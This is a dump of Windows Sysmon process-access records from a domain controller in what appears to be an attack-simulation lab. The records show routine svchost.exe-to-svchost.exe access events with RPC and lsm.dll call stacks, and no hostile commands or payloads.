13:29:58.763{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010374Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.763{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010373Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.763{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010372Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.763{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010371Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.763{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010370Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.763{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010369Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.763{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010368Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.763{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010367Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.763{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010366Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.748{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010365Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.748{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010364Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.748{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010363Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.748{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010362Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.748{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010361Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.748{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010360Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.748{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010359Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.732{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010358Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.732{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010357Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.701{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010356Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.701{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010355Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.701{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010354Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.701{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010353Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.701{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010352Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.701{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010351Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 